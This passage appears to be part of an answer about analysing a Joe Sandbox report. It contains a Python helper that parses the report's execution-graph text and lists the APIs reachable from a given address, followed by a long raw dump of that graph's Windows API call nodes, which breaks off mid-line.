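55841 4413a4 55842 4413ad 55841->55842 55843 4413bb WriteFile 55841->55843 55844 4413c6 55843->55844
"""


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> {"addr": int, "label": str},
    edges maps src id -> set of dst ids.  Edges may appear before the node
    they point at is defined, so they are kept by id and never resolved
    eagerly."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(set)
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[m.group(1)].add(m.group(2))
            i += 1
            continue
        # A node starts with a decimal id followed by a hex address.  A bare
        # number inside a label ("18 API calls") is followed by a word, so it
        # does not satisfy this test and stays part of the label.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": int(tokens[i + 1], 16), "label": []}
            i += 2
            continue
        if current is not None:          # label word of the node being defined
            nodes[current]["label"].append(tok)
        i += 1
    for node in nodes.values():
        node["label"] = " ".join(node["label"])
    return nodes, edges


def node_at(nodes, addr):
    """Return the id of the node whose function starts at addr, or None."""
    for nid, node in nodes.items():
        if node["addr"] == addr:
            return nid
    return None


def reachable_apis(nodes, edges, root):
    """Breadth-first walk of the call edges from root, collecting every API
    name seen on the way.  Collapsed nodes ("18 API calls") are returned
    verbatim: the dump does not say which APIs they hide, so they must be
    treated as unresolved rather than silently dropped."""
    seen, queue, apis = {root}, deque([root]), set()
    while queue:
        nid = queue.popleft()
        label = nodes.get(nid, {}).get("label", "")
        if COLLAPSED.match(label):
            apis.add(label)
        elif label:
            apis.update(label.split())
        for dst in edges.get(nid, ()):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return apis


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    root = node_at(nodes, 0x492208)
    print(f"node {root} @ 0x492208 reaches {sorted(reachable_apis(nodes, edges, root))}")
```

Paste the whole execution_graph text into parse_execution_graph in place of SAMPLE to work on the real report; the walk is linear in the number of tokens, so the 2000-node graph is not a problem. Anything reported as "N API calls" is a node Joe Sandbox collapsed (the "Limit Nodes" count above), so those functions still need a look in the disassembly before you conclude a path is benign.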
                                                                                execution_graph 49694 40cf00 49695 40cf12 49694->49695 49696 40cf0d 49694->49696 49698 406f50 CloseHandle 49696->49698 49698->49695 55841 4413a4 55842 4413ad 55841->55842 55843 4413bb WriteFile 55841->55843 55842->55843 55844 4413c6 55843->55844 49699 492208 49700 49223c 49699->49700 49701 49223e 49700->49701 49702 492252 49700->49702 49845 446fac 18 API calls 49701->49845 49705 492261 49702->49705 49707 49228e 49702->49707 49704 492247 Sleep 49719 492289 49704->49719 49835 447008 49705->49835 49711 4922ca 49707->49711 49712 49229d 49707->49712 49709 492270 49713 492278 FindWindowA 49709->49713 49717 4922d9 49711->49717 49718 492320 49711->49718 49714 447008 18 API calls 49712->49714 49839 447288 49713->49839 49716 4922aa 49714->49716 49721 4922b2 FindWindowA 49716->49721 49846 446fac 18 API calls 49717->49846 49724 49237c 49718->49724 49725 49232f 49718->49725 49885 403420 49719->49885 49723 447288 5 API calls 49721->49723 49722 4922e5 49847 446fac 18 API calls 49722->49847 49727 4922c5 49723->49727 49734 4923d8 49724->49734 49735 49238b 49724->49735 49850 446fac 18 API calls 49725->49850 49727->49719 49729 4922f2 49848 446fac 18 API calls 49729->49848 49730 49233b 49851 446fac 18 API calls 49730->49851 49733 4922ff 49849 446fac 18 API calls 49733->49849 49745 492412 49734->49745 49746 4923e7 49734->49746 49855 446fac 18 API calls 49735->49855 49737 492348 49852 446fac 18 API calls 49737->49852 49739 492397 49856 446fac 18 API calls 49739->49856 49741 49230a SendMessageA 49744 447288 5 API calls 49741->49744 49743 492355 49853 446fac 18 API calls 49743->49853 49744->49727 49754 492421 49745->49754 49755 492460 49745->49755 49749 447008 18 API calls 49746->49749 49747 4923a4 49857 446fac 18 API calls 49747->49857 49752 4923f4 49749->49752 49751 492360 PostMessageA 49854 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49751->49854 49757 4923fc RegisterClipboardFormatA 
49752->49757 49753 4923b1 49858 446fac 18 API calls 49753->49858 49860 446fac 18 API calls 49754->49860 49763 49246f 49755->49763 49764 4924b4 49755->49764 49760 447288 5 API calls 49757->49760 49760->49719 49761 4923bc SendNotifyMessageA 49859 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49761->49859 49762 49242d 49861 446fac 18 API calls 49762->49861 49863 446fac 18 API calls 49763->49863 49773 492508 49764->49773 49774 4924c3 49764->49774 49768 49243a 49862 446fac 18 API calls 49768->49862 49769 49247b 49864 446fac 18 API calls 49769->49864 49772 492445 SendMessageA 49777 447288 5 API calls 49772->49777 49782 49256a 49773->49782 49783 492517 49773->49783 49867 446fac 18 API calls 49774->49867 49776 492488 49865 446fac 18 API calls 49776->49865 49777->49727 49778 4924cf 49868 446fac 18 API calls 49778->49868 49781 492493 PostMessageA 49866 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49781->49866 49790 492579 49782->49790 49791 4925f1 49782->49791 49786 447008 18 API calls 49783->49786 49784 4924dc 49869 446fac 18 API calls 49784->49869 49788 492524 49786->49788 49871 42e3a4 SetErrorMode 49788->49871 49789 4924e7 SendNotifyMessageA 49870 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49789->49870 49794 447008 18 API calls 49790->49794 49800 492600 49791->49800 49801 492626 49791->49801 49798 492588 49794->49798 49795 492531 49796 492547 GetLastError 49795->49796 49797 492537 49795->49797 49802 447288 5 API calls 49796->49802 49799 447288 5 API calls 49797->49799 49874 446fac 18 API calls 49798->49874 49803 492545 49799->49803 49879 446fac 18 API calls 49800->49879 49810 492658 49801->49810 49811 492635 49801->49811 49802->49803 49807 447288 5 API calls 49803->49807 49806 49260a FreeLibrary 49880 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49806->49880 49807->49719 49808 49259b GetProcAddress 49812 4925e1 49808->49812 49813 4925a7 49808->49813 49818 492667 49810->49818 49824 
49269b 49810->49824 49814 447008 18 API calls 49811->49814 49878 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49812->49878 49875 446fac 18 API calls 49813->49875 49816 492641 49814->49816 49822 492649 CreateMutexA 49816->49822 49881 48c638 18 API calls 49818->49881 49819 4925b3 49876 446fac 18 API calls 49819->49876 49822->49719 49823 4925c0 49827 447288 5 API calls 49823->49827 49824->49719 49883 48c638 18 API calls 49824->49883 49826 492673 49828 492684 OemToCharBuffA 49826->49828 49829 4925d1 49827->49829 49882 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49828->49882 49877 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49829->49877 49832 4926b6 49833 4926c7 CharToOemBuffA 49832->49833 49884 48c650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49833->49884 49836 447010 49835->49836 49889 436088 49836->49889 49838 44702f 49838->49709 49840 447290 49839->49840 49943 4363f0 VariantClear 49840->49943 49842 4472b3 49843 4472ca 49842->49843 49944 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49842->49944 49843->49719 49845->49704 49846->49722 49847->49729 49848->49733 49849->49741 49850->49730 49851->49737 49852->49743 49853->49751 49854->49727 49855->49739 49856->49747 49857->49753 49858->49761 49859->49719 49860->49762 49861->49768 49862->49772 49863->49769 49864->49776 49865->49781 49866->49727 49867->49778 49868->49784 49869->49789 49870->49719 49945 403738 49871->49945 49874->49808 49875->49819 49876->49823 49877->49727 49878->49727 49879->49806 49880->49719 49881->49826 49882->49719 49883->49832 49884->49719 49887 403426 49885->49887 49886 40344b 49887->49886 49888 402660 4 API calls 49887->49888 49888->49887 49890 436094 49889->49890 49906 4360b6 49889->49906 49890->49906 49909 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49890->49909 49891 436139 49918 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49891->49918 49893 436121 49913 403494 49893->49913 49894 
436109 49898 403510 4 API calls 49894->49898 49895 4360fd 49910 403510 49895->49910 49896 43612d 49917 4040e8 18 API calls 49896->49917 49903 436112 49898->49903 49902 43614a 49902->49838 49903->49838 49904 436115 49904->49838 49906->49891 49906->49893 49906->49894 49906->49895 49906->49896 49906->49904 49907 436136 49907->49838 49909->49906 49919 4034e0 49910->49919 49915 403498 49913->49915 49914 4034ba 49914->49838 49915->49914 49916 402660 4 API calls 49915->49916 49916->49914 49917->49907 49918->49902 49924 4034bc 49919->49924 49922 4034f0 49929 403400 49922->49929 49925 4034c0 49924->49925 49926 4034dc 49924->49926 49933 402648 49925->49933 49926->49922 49928 4034c9 49928->49922 49930 403406 49929->49930 49931 40341f 49929->49931 49930->49931 49938 402660 49930->49938 49931->49838 49934 40264c 49933->49934 49935 402656 49933->49935 49934->49935 49937 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49934->49937 49935->49928 49935->49935 49937->49935 49939 402664 49938->49939 49941 40266e 49938->49941 49939->49941 49942 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49939->49942 49941->49931 49942->49941 49943->49842 49944->49843 49946 40373c LoadLibraryA 49945->49946 49946->49795 49947 402584 49948 402598 49947->49948 49949 4025ab 49947->49949 49977 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49948->49977 49950 4025c2 RtlEnterCriticalSection 49949->49950 49951 4025cc 49949->49951 49950->49951 49963 4023b4 13 API calls 49951->49963 49953 40259d 49953->49949 49955 4025a1 49953->49955 49956 4025d9 49959 402635 49956->49959 49960 40262b RtlLeaveCriticalSection 49956->49960 49957 4025d5 49957->49956 49964 402088 49957->49964 49960->49959 49961 4025e5 49961->49956 49978 402210 9 API calls 49961->49978 49963->49957 49965 40209c 49964->49965 49966 4020af 49964->49966 49985 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49965->49985 49968 4020c6 
RtlEnterCriticalSection 49966->49968 49971 4020d0 49966->49971 49968->49971 49969 4020a1 49969->49966 49970 4020a5 49969->49970 49974 402106 49970->49974 49971->49974 49979 401f94 49971->49979 49974->49961 49975 4021f1 RtlLeaveCriticalSection 49976 4021fb 49975->49976 49976->49961 49977->49953 49978->49956 49980 401fa4 49979->49980 49981 401fd0 49980->49981 49984 401ff4 49980->49984 49986 401f0c 49980->49986 49981->49984 49991 401db4 49981->49991 49984->49975 49984->49976 49985->49969 49995 40178c 49986->49995 49989 401f29 49989->49980 49992 401dd2 49991->49992 49993 401e02 49991->49993 49992->49984 49993->49992 50018 401d1c 49993->50018 49998 4017a8 49995->49998 49997 4017b2 50014 401678 VirtualAlloc 49997->50014 49998->49997 50000 40180f 49998->50000 50002 401803 49998->50002 50006 4014e4 49998->50006 50015 4013e0 LocalAlloc 49998->50015 50000->49989 50005 401e80 9 API calls 50000->50005 50016 4015c0 VirtualFree 50002->50016 50003 4017be 50003->50000 50005->49989 50007 4014f3 VirtualAlloc 50006->50007 50009 401520 50007->50009 50010 401543 50007->50010 50017 401398 LocalAlloc 50009->50017 50010->49998 50012 40152c 50012->50010 50013 401530 VirtualFree 50012->50013 50013->50010 50014->50003 50015->49998 50016->50000 50017->50012 50019 401d2e 50018->50019 50020 401d51 50019->50020 50021 401d63 50019->50021 50031 401940 50020->50031 50023 401940 3 API calls 50021->50023 50024 401d61 50023->50024 50025 401d79 50024->50025 50041 401bf8 9 API calls 50024->50041 50025->49992 50027 401d88 50028 401da2 50027->50028 50042 401c4c 9 API calls 50027->50042 50043 401454 LocalAlloc 50028->50043 50032 401966 50031->50032 50040 4019bf 50031->50040 50044 40170c 50032->50044 50036 401983 50038 40199a 50036->50038 50049 4015c0 VirtualFree 50036->50049 50038->50040 50050 401454 LocalAlloc 50038->50050 50040->50024 50041->50027 50042->50028 50043->50025 50045 401743 50044->50045 50046 401783 50045->50046 50047 40175d VirtualFree 50045->50047 50048 4013e0 LocalAlloc 50046->50048 
50047->50045 50048->50036 50049->50038 50050->50040 55845 48042c 55850 450ff0 55845->55850 55847 480440 55860 47f518 55847->55860 55849 480464 55851 450ffd 55850->55851 55853 451051 55851->55853 55866 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55851->55866 55854 450e74 InterlockedExchange 55853->55854 55855 451063 55854->55855 55857 451079 55855->55857 55867 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55855->55867 55858 4510bc 55857->55858 55868 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55857->55868 55858->55847 55869 40b5c8 55860->55869 55862 47f53a 55863 47f585 55862->55863 55864 4069e4 4 API calls 55862->55864 55873 4768b0 55862->55873 55863->55849 55864->55862 55866->55853 55867->55857 55868->55858 55871 40b5d3 55869->55871 55870 40b5f3 55870->55862 55871->55870 55889 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55871->55889 55881 4768e1 55873->55881 55883 47692a 55873->55883 55874 476975 55890 451280 55874->55890 55876 451280 21 API calls 55876->55883 55877 4038a4 4 API calls 55877->55881 55878 47698c 55879 403420 4 API calls 55878->55879 55882 4769a6 55879->55882 55880 4038a4 4 API calls 55880->55883 55881->55877 55881->55883 55884 403744 4 API calls 55881->55884 55885 403450 4 API calls 55881->55885 55888 451280 21 API calls 55881->55888 55882->55862 55883->55874 55883->55876 55883->55880 55886 403744 4 API calls 55883->55886 55887 403450 4 API calls 55883->55887 55884->55881 55885->55881 55886->55883 55887->55883 55888->55881 55889->55870 55891 45129b 55890->55891 55895 451290 55890->55895 55896 451224 21 API calls 55891->55896 55893 4512a6 55893->55895 55897 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55893->55897 55895->55878 55896->55893 55897->55895 55898 41ee64 55899 41ee73 IsWindowVisible 55898->55899 55900 41eea9 55898->55900 55899->55900 55901 41ee7d IsWindowEnabled 55899->55901 55901->55900 55902 41ee87 55901->55902 55903 402648 4 API calls 55902->55903 55904 41ee91 EnableWindow 55903->55904 
55904->55900 55905 41fb68 55906 41fb71 55905->55906 55909 41fe0c 55906->55909 55908 41fb7e 55910 41fefe 55909->55910 55911 41fe23 55909->55911 55910->55908 55911->55910 55930 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55911->55930 55913 41fe59 55914 41fe83 55913->55914 55915 41fe5d 55913->55915 55940 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 55914->55940 55931 41fbac 55915->55931 55918 41fe91 55920 41fe95 55918->55920 55921 41febb 55918->55921 55924 41fbac 10 API calls 55920->55924 55925 41fbac 10 API calls 55921->55925 55922 41fbac 10 API calls 55923 41fe81 55922->55923 55923->55908 55926 41fea7 55924->55926 55927 41fecd 55925->55927 55928 41fbac 10 API calls 55926->55928 55929 41fbac 10 API calls 55927->55929 55928->55923 55929->55923 55930->55913 55932 41fbc7 55931->55932 55933 41fbdd 55932->55933 55934 41f94c 4 API calls 55932->55934 55941 41f94c 55933->55941 55934->55933 55936 41fc25 55937 41fc48 SetScrollInfo 55936->55937 55949 41faac 55937->55949 55940->55918 55942 4181f0 55941->55942 55943 41f969 GetWindowLongA 55942->55943 55944 41f9a6 55943->55944 55945 41f986 55943->55945 55961 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55944->55961 55960 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 55945->55960 55948 41f992 55948->55936 55950 41faba 55949->55950 55951 41fac2 55949->55951 55950->55922 55952 41fb01 55951->55952 55953 41faf1 55951->55953 55959 41faff 55951->55959 55963 417e58 IsWindowVisible ScrollWindow SetWindowPos 55952->55963 55962 417e58 IsWindowVisible ScrollWindow SetWindowPos 55953->55962 55954 41fb41 GetScrollPos 55954->55950 55957 41fb4c 55954->55957 55958 41fb5b SetScrollPos 55957->55958 55958->55950 55959->55954 55960->55948 55961->55948 55962->55959 55963->55959 55964 4205a8 55965 4205bb 55964->55965 55985 415b40 55965->55985 55967 420702 55968 420719 55967->55968 55992 4146e4 KiUserCallbackDispatcher 55967->55992 55972 420730 55968->55972 55993 414728 
KiUserCallbackDispatcher 55968->55993 55969 420661 55990 420858 20 API calls 55969->55990 55970 4205f6 55970->55967 55970->55969 55978 420652 MulDiv 55970->55978 55975 420752 55972->55975 55994 420070 12 API calls 55972->55994 55976 42067a 55976->55967 55991 420070 12 API calls 55976->55991 55989 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 55978->55989 55981 420697 55982 4206b3 MulDiv 55981->55982 55983 4206d6 55981->55983 55982->55983 55983->55967 55984 4206df MulDiv 55983->55984 55984->55967 55986 415b52 55985->55986 55995 414480 55986->55995 55988 415b6a 55988->55970 55989->55969 55990->55976 55991->55981 55992->55968 55993->55972 55994->55975 55996 41449a 55995->55996 55999 410658 55996->55999 55998 4144b0 55998->55988 56002 40dea4 55999->56002 56001 41065e 56001->55998 56003 40df06 56002->56003 56004 40deb7 56002->56004 56009 40df14 56003->56009 56007 40df14 19 API calls 56004->56007 56008 40dee1 56007->56008 56008->56001 56010 40df24 56009->56010 56012 40df3a 56010->56012 56021 40e29c 56010->56021 56037 40d7e0 56010->56037 56040 40e14c 56012->56040 56015 40d7e0 5 API calls 56016 40df42 56015->56016 56016->56015 56017 40dfae 56016->56017 56043 40dd60 56016->56043 56018 40e14c 5 API calls 56017->56018 56020 40df10 56018->56020 56020->56001 56057 40eb6c 56021->56057 56023 403778 4 API calls 56025 40e2d7 56023->56025 56024 40e38d 56026 40e3b7 56024->56026 56027 40e3a8 56024->56027 56025->56023 56025->56024 56120 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56120 56121 40e280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56025->56121 56117 40bc24 56026->56117 56066 40e5c0 56027->56066 56032 40e3b5 56034 403400 4 API calls 56032->56034 56035 40e45c 56034->56035 56035->56010 56038 40ec08 5 API calls 56037->56038 56039 40d7ea 56038->56039 56039->56010 56154 40d6bc 56040->56154 56163 40e154 56043->56163 56046 40eb6c 5 API calls 56047 40dd9e 56046->56047 56048 40eb6c 5 API calls 56047->56048 56049 40dda9 
56048->56049 56050 40ddc4 56049->56050 56051 40ddbb 56049->56051 56056 40ddc1 56049->56056 56170 40dbd8 56050->56170 56173 40dcc8 19 API calls 56051->56173 56054 403420 4 API calls 56055 40de8f 56054->56055 56055->56016 56056->56054 56123 40d980 56057->56123 56060 4034e0 4 API calls 56061 40eb8f 56060->56061 56062 403744 4 API calls 56061->56062 56063 40eb96 56062->56063 56064 40d980 5 API calls 56063->56064 56065 40eba4 56064->56065 56065->56025 56067 40e5f6 56066->56067 56068 40e5ec 56066->56068 56070 40e711 56067->56070 56071 40e695 56067->56071 56072 40e6f6 56067->56072 56073 40e776 56067->56073 56074 40e638 56067->56074 56075 40e6d9 56067->56075 56076 40e67a 56067->56076 56077 40e6bb 56067->56077 56110 40e65c 56067->56110 56128 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56068->56128 56078 40d964 5 API calls 56070->56078 56136 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56071->56136 56141 40ea90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56072->56141 56082 40d964 5 API calls 56073->56082 56129 40d964 56074->56129 56139 40eba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56075->56139 56135 40da18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56076->56135 56138 40dfe4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56077->56138 56087 40e719 56078->56087 56081 403400 4 API calls 56088 40e7eb 56081->56088 56089 40e77e 56082->56089 56093 40e723 56087->56093 56094 40e71d 56087->56094 56088->56032 56095 40e782 56089->56095 56096 40e79b 56089->56096 56090 40e6e4 56140 409f38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56090->56140 56092 40e6a0 56137 40d670 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56092->56137 56142 40ec08 56093->56142 56102 40e721 56094->56102 56103 40e73c 56094->56103 56105 40ec08 5 API calls 56095->56105 56148 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56096->56148 56098 40e661 56134 40e0d8 LocalAlloc 
53923 47d665 53914->53923 53915 47d6c9 53916 403420 4 API calls 53915->53916 53917 47d80e 53916->53917 53917->53881 53918 47954c 19 API calls 53918->53920 53920->53915 53920->53918 53924 47d77c 53920->53924 53921 4797f0 4 API calls 53921->53923 53922 47bfd8 43 API calls 53922->53924 53923->53915 53923->53920 53923->53921 53927 47bfd8 43 API calls 53923->53927 53931 47d6d2 53923->53931 53950 47968c 53923->53950 53924->53920 53924->53922 53926 4540ec 20 API calls 53924->53926 53928 47d713 53924->53928 53925 47bfd8 43 API calls 53925->53931 53926->53924 53927->53923 53928->53915 53929 42c93c 5 API calls 53929->53931 53930 42c964 5 API calls 53930->53931 53931->53923 53931->53925 53931->53928 53931->53929 53931->53930 53961 47d334 52 API calls 53931->53961 53934 42de2c RegOpenKeyExA 53933->53934 53935 455a19 53934->53935 53936 455a67 53935->53936 53942 455930 53935->53942 53936->53913 53939 455930 6 API calls 53940 455a48 RegCloseKey 53939->53940 53940->53913 53941->53913 53947 42dd68 53942->53947 53944 403420 4 API calls 53945 4559e2 53944->53945 53945->53939 53946 455958 53946->53944 53948 42dc10 6 API calls 53947->53948 53949 42dd71 53948->53949 53949->53946 53951 4796a2 53950->53951 53952 47969e 53950->53952 53953 403450 4 API calls 53951->53953 53952->53923 53954 4796af 53953->53954 53955 4796b5 53954->53955 53956 4796cf 53954->53956 53957 47954c 19 API calls 53955->53957 53958 47954c 19 API calls 53956->53958 53959 4796cb 53957->53959 53958->53959 53960 403400 4 API calls 53959->53960 53960->53952 53961->53931 53963 403494 4 API calls 53962->53963 53964 466aae 53963->53964 53965 42dbd8 5 API calls 53964->53965 53966 466ac0 53965->53966 53967 42dbd8 5 API calls 53966->53967 53968 466ad2 53967->53968 53969 46696c 19 API calls 53968->53969 53970 466adc 53969->53970 53971 42dbd8 5 API calls 53970->53971 53972 466aeb 53971->53972 53979 4669e4 53972->53979 53975 42dbd8 5 API calls 53976 466b04 53975->53976 53977 403400 4 API calls 53976->53977 53978 466b19 53977->53978 
53978->53414 53980 466a04 53979->53980 53981 4078fc 19 API calls 53980->53981 53982 466a4e 53981->53982 53982->53975 53984 4242be 53983->53984 53985 42429e GetWindowTextA 53983->53985 53987 403494 4 API calls 53984->53987 53986 4034e0 4 API calls 53985->53986 53988 4242bc 53986->53988 53987->53988 53988->53899 53992 44b39c 53989->53992 53991 44b537 53991->53905 53993 44b3cf 53992->53993 53994 414af8 4 API calls 53993->53994 53995 44b3e2 53994->53995 53996 44b40f 73E9A570 53995->53996 53997 40357c 4 API calls 53995->53997 54003 41a1f8 53996->54003 53997->53996 54000 44b440 54011 44b0d0 54000->54011 54002 44b454 73E9A480 54002->53991 54004 41a223 54003->54004 54005 41a2bf 54003->54005 54008 403520 4 API calls 54004->54008 54006 403400 4 API calls 54005->54006 54007 41a2d7 SelectObject 54006->54007 54007->54000 54009 41a27b 54008->54009 54010 41a2b3 CreateFontIndirectA 54009->54010 54010->54005 54012 44b0e7 54011->54012 54013 44b17a 54012->54013 54014 44b163 54012->54014 54015 44b0fa 54012->54015 54013->54002 54016 44b173 DrawTextA 54014->54016 54015->54013 54017 402648 4 API calls 54015->54017 54016->54013 54018 44b10b 54017->54018 54019 44b129 MultiByteToWideChar DrawTextW 54018->54019 54020 402660 4 API calls 54019->54020 54021 44b15b 54020->54021 54021->54002 54024 465643 54022->54024 54023 46571e 54033 4673f8 54023->54033 54024->54023 54028 465693 54024->54028 54045 421a2c 54024->54045 54025 4656d6 54025->54023 54051 4185c8 7 API calls 54025->54051 54028->54025 54029 4656cd 54028->54029 54030 4656d8 54028->54030 54031 421a2c 7 API calls 54029->54031 54032 421a2c 7 API calls 54030->54032 54031->54025 54032->54025 54034 467428 54033->54034 54035 467409 54033->54035 54034->53476 54036 414b28 4 API calls 54035->54036 54037 467417 54036->54037 54038 414b28 4 API calls 54037->54038 54038->54034 54040 46b041 54039->54040 54041 421a2c 7 API calls 54040->54041 54042 46b0cc 54041->54042 54042->53499 54043 466ecc 18 API calls 54042->54043 54043->53499 54044->53500 54047 
421a84 54045->54047 54050 421a3a 54045->54050 54047->54028 54049 421a69 54049->54047 54060 421d38 SetFocus GetFocus 54049->54060 54050->54049 54052 408cc4 54050->54052 54051->54023 54053 408cd0 54052->54053 54061 406df4 LoadStringA 54053->54061 54056 403450 4 API calls 54057 408d01 54056->54057 54058 403400 4 API calls 54057->54058 54059 408d16 54058->54059 54059->54049 54060->54047 54062 4034e0 4 API calls 54061->54062 54063 406e21 54062->54063 54063->54056 54065 402648 4 API calls 54064->54065 54066 47dc4c 54065->54066 54067 47d628 61 API calls 54066->54067 54068 47dc6b 54067->54068 54069 47dc7f 54068->54069 54080 47da48 54068->54080 54071 47dcab 54069->54071 54073 402660 4 API calls 54069->54073 54072 402660 4 API calls 54071->54072 54074 47dcb5 54072->54074 54073->54069 54074->53504 54075->53529 54076->53524 54081 403494 4 API calls 54080->54081 54096 47da75 54081->54096 54082 47dad8 54083 47db44 54083->54082 54091 402660 4 API calls 54099 47dac8 54091->54099 54094 42c93c 5 API calls 54094->54096 54096->54094 54096->54099 54100 42e8b0 CharNextA 54096->54100 54099->54082 54099->54083 54099->54091 54100->54096 54103 46ca4d 54102->54103 54104 46ca9a 54103->54104 54105 414af8 4 API calls 54103->54105 54107 403420 4 API calls 54104->54107 54106 46ca63 54105->54106 54301 466c90 6 API calls 54106->54301 54109 46cb44 54107->54109 54109->53556 54293 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54109->54293 54110 46ca6b 54111 414b28 4 API calls 54110->54111 54112 46ca79 54111->54112 54113 46ca86 54112->54113 54116 46ca9f 54112->54116 54302 47eadc 42 API calls 54113->54302 54115 46cab7 54303 47eadc 42 API calls 54115->54303 54116->54115 54117 466d74 CharNextA 54116->54117 54119 46cab3 54117->54119 54119->54115 54120 46cacd 54119->54120 54121 46cad3 54120->54121 54122 46cae9 54120->54122 54304 47eadc 42 API calls 54121->54304 54124 42c9ac CharNextA 54122->54124 54125 46caf6 54124->54125 54125->54104 54305 466e00 LocalAlloc TlsSetValue TlsGetValue 
TlsGetValue 54125->54305 54127 46cb0d 54128 451444 4 API calls 54127->54128 54129 46cb1a 54128->54129 54306 47eadc 42 API calls 54129->54306 54132 481f8d 54131->54132 54133 481f5f 54131->54133 54135 475dbc 54132->54135 54307 4946bc 18 API calls 54133->54307 54136 457b4c 24 API calls 54135->54136 54137 475e08 54136->54137 54138 4072b0 SetCurrentDirectoryA 54137->54138 54139 475e12 54138->54139 54308 46e5b0 54139->54308 54143 475e22 54294->53564 54301->54110 54302->54104 54303->54104 54304->54104 54305->54127 54306->54104 54307->54132 54309 46e623 54308->54309 54311 46e5cd 54308->54311 54312 46e628 54309->54312 54310 47968c 19 API calls 54310->54311 54311->54309 54311->54310 54313 46e64e 54312->54313 54756 44fb08 54313->54756 54315 46e6aa 54315->54143 54759 44fb1c 54756->54759 54760 44fb2d 54759->54760 54761 44fb19 54760->54761 54762 44fb57 MulDiv 54760->54762 54761->54315 54763 4181f0 54762->54763 54764 44fb82 SendMessageA 54763->54764 54764->54761 56176 498578 56234 403344 56176->56234 56178 498586 56237 4056a0 56178->56237 56180 49858b 56240 406334 GetModuleHandleA GetProcAddress 56180->56240 56186 49859a 56257 410964 56186->56257 56188 49859f 56261 412938 56188->56261 56190 4985a9 56266 419050 GetVersion 56190->56266 56507 4032fc 56234->56507 56236 403349 GetModuleHandleA GetCommandLineA 56236->56178 56239 4056db 56237->56239 56508 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56237->56508 56239->56180 56241 406350 56240->56241 56242 406357 GetProcAddress 56240->56242 56241->56242 56243 406366 56242->56243 56244 40636d GetProcAddress 56242->56244 56243->56244 56245 406380 56244->56245 56246 40637c SetProcessDEPPolicy 56244->56246 56247 409954 56245->56247 56246->56245 56509 40902c 56247->56509 56252 408728 7 API calls 56253 409977 56252->56253 56524 409078 GetVersionExA 56253->56524 56256 409b88 6F9C1CD0 56256->56186 56258 41096e 56257->56258 56259 4109ad GetCurrentThreadId 56258->56259 56260 4109c8 56259->56260 56260->56188 56526 40af0c 56261->56526 
56265 412964 56265->56190 56538 41de34 8 API calls 56266->56538 56268 419069 56540 418f48 GetCurrentProcessId 56268->56540 56507->56236 56508->56239 56510 408cc4 5 API calls 56509->56510 56511 40903d 56510->56511 56512 4085e4 GetSystemDefaultLCID 56511->56512 56516 40861a 56512->56516 56513 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56513->56516 56514 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56514->56516 56515 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56515->56516 56516->56513 56516->56514 56516->56515 56520 40867c 56516->56520 56517 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56517->56520 56518 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56518->56520 56519 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56519->56520 56520->56517 56520->56518 56520->56519 56521 4086ff 56520->56521 56522 403420 4 API calls 56521->56522 56523 408719 56522->56523 56523->56252 56525 40908f 56524->56525 56525->56256 56527 40af13 56526->56527 56528 